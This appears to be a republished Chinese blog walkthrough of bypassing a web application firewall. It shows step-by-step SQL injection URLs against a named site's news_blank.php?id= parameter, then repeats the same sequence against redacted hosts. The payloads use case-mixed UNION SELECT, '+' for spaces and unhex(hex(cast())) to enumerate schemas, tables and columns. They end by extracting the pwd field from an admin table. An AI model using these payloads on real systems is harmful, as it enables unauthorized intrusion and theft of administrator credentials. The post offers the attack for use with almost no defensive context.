首页 > 其他分享 >WAF绕过实战

WAF绕过实战

时间:2024-11-03 10:21:40浏览次数:5  
标签:实战 11 WAF blank news 绕过 php com id

网站地址:

http://www.ghtcghtc.com

注入地址:

http://www.ghtcghtc.com/news_blank.php?id=35

  1. http://www.ghtcghtc.com/news_blank.php?id=36-1 判断出数值型
  2. http://www.ghtcghtc.com/news_blank.php?id=35 and 1=1 被拦截
  1. http://www.ghtcghtc.com/news_blank.php?id=35+and+1=1
  2. http://www.ghtcghtc.com/news_blank.php?id=35+and+1=2
  3. order by 判断为11个字段
  4. -35+union+select+1,2,3,4,5,6,7,8,9,10,11 4和8的位置
  1. -35+union+select+1,2,3,(database()),5,6,7,8,9,10,11

8.35+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(schema_name%20as%20char))),5,6,7,8,9,10,11%20from%20information_schema.schemata%20limit%202,1

HEX()函数:返回十六进制值的字符串表示形式

UNHEX() 函数: 每对十六进制数字转化为一个字符

CAST函数用于将某种数据类型的表达式显式转换为另一种数据类型。CAST()函数的参数是一个表达式,它包括用AS关键字分隔的源值和目标数据类型。

9

+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(table_name as char))),5,6,7,8,9,10,11 from information_schema.tables where table_schema='hengdong' limit 0,1

  1. +UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(column_name as char))),5,6,7,8,9,10,11 from information_schema.columns where table_schema='hengdong' and table_name='hdwl_admin' limit 3,4
  2. +UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(pwd as char))),5,6,7,8,9,10,11  from hdwl_admin

其他解答:

http://xxx.com/news_blank.php?id=296 and 1=1

http://xxxxx.com/news_blank.php?id=296+and+1=1

http://xxxx.com/news_blank.php?id=296+and+1=2

http://xxxx.com/news_blank.php?id=296 order by 11  正确

http://xxxx.com/news_blank.php?id=296 order by 12 错误

http://xxxx.com/news_blank.php?id=296 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11 拦截

http://xxxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,4,5,6,7,8,9,10,11--+

http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,user(),5,6,7,version(),9,10,11--+

http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(schema_name as char))),5,6,7,version(),9,10,11 from information_schema.schemata limit 1,2

http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(table_name as char))),5,6,7,version(),9,10,11  from information_schema.tables where table_schema='hengdong' limit 0,1

http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(column_name as char))),5,6,7,version(),9,10,11  from information_schema.columns where table_schema='hengdong' and table_name='hdwl_admin' limit 3,4

http://xxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(pwd as char))),5,6,7,version(),9,10,11  from hdwl_admin

标签:实战,11,WAF,blank,news,绕过,php,com,id
From: https://www.cnblogs.com/zdytom/p/18522947

相关文章

  • SQL注入绕过
    WAF介绍一、WAF介绍WAF(WebApplicationFirewall,Web应用防火墙)及与其相关的知识,这里利用国际上公认的一种说法:Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为web应用提供保护的一款产品。WAF基本上可以分为以下几类:1.1软件型WAF以软件形式装在所保护的服务......
  • 鸿蒙NEXT开发实战教程:仿抖音短视频
    今天的实战教程是简单模仿一下抖音短视频,主要是首页部分的内容,先看效果图:下面为大家讲解这个项目的详细教程。tabbarTabbar的难点在于中间有个发布按钮,思路是我们可以在tabbar里加个判断,中间按钮使用图片,其余按钮使用文字。相关代码如下:@Statearr:Array<string>=['首......
  • HarmonyOS NEXT开发实战教程:选择相册和拍照
    今天的内容是介绍在鸿蒙开发中从相册选择照片,和调用相机拍照,并使用这两个功能实现朋友圈编辑页面。  这部分内容没什么好废话的,都是固定用法,直接上代码。首先添加权限:ohos.permission.CAMERAohos.permission.READ_IMAGEVIDEO选择相册:​asyncgetAlbum(){co......
  • chrome浏览器断点调试工具之无限debugger的原理与绕过
    文章目录1、debugger介绍2、无限debugger案例演示3、无限debugger解决方法3.1实现原理3.2方法1:禁用断点(全局)3.3方法2:局部禁用(1)3.4方法3:局部禁用(2)3.5方法4:利用第三方工具fiddler解除无限debug1、debugger介绍debugger是JavaScript中定义的一个专门用于断点调......
  • Spring Boot框架在信息学科平台建设中的实战技巧
    3系统分析3.1可行性分析通过对本基于保密信息学科平台系统实行的目的初步调查和分析,提出可行性方案并对其一一进行论证。我们在这里主要从技术可行性、经济可行性、操作可行性等方面进行分析。3.1.1技术可行性本基于保密信息学科平台系统采用SpringBoot框架,JAVA作为开......
  • OBV量能指标的实战用法
    OBV能量潮又称为平衡交易量,是由美国投资分析家葛兰碧在1981年创立的,它的理论基础是“能量是因,股价是果”。能量潮是将成交量数量化,制成趋势线,配合股价趋势线,从价格的变动及成交量的增减关系,推测市场气氛。其主要理论基础是市场价格的变化必须有成交量的配合,股价的波动与成交量的扩......
  • Java项目实战II基于Java+Spring Boot+MySQL的工程教育认证的计算机课程管理平台(源码+
    目录一、前言二、技术介绍三、系统实现四、文档参考五、核心代码六、源码获取全栈码农以及毕业设计实战开发,CSDN平台Java领域新星创作者,专注于大学生项目实战开发、讲解和毕业答疑辅导。获取源码联系方式请查看文末一、前言随着工程教育认证的深入发展,对计算机课程......
  • Java项目实战II基于Java+Spring Boot+MySQL的植物健康系统(开发文档+数据库+源码)
    目录一、前言二、技术介绍三、系统实现四、文档参考五、核心代码六、源码获取全栈码农以及毕业设计实战开发,CSDN平台Java领域新星创作者,专注于大学生项目实战开发、讲解和毕业答疑辅导。获取源码联系方式请查看文末一、前言基于Java、SpringBoot和MySQL的植物健康......
  • shodan(五)连接Mongodb数据库&Jenkins&org、net、查看waf命令
    声明:学习素材来自b站up【泷羽Sec】,侵删,若阅读过程中有相关方面的不足,还请指正,本文只做相关技术分享,切莫从事违法等相关行为,本人一律不承担一切后果引言:     1.Shodan是一个专门用于搜索连接到互联网的设备的搜索引擎。与传统搜索引擎(如Google)不同,Shodan的焦点不......
  • RTX5/FreeRTOS全家桶源码工程综合实战模板集成CANopen组件(2024-10-30)
    【前言】之前的视频教程分享了两期CANopen的专题,配套的例子都是基于裸机的,为了方便大家在OS下使用,本期视频带OS下的支持。CANopen协议栈专题,实战方式系统了解NMT,PDO,SDO,时间戳,同步报文,紧急报文等(2023-10-17)https://www.armbbs.cn/forum.php?mod=viewthread&tid=121438CANopen......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99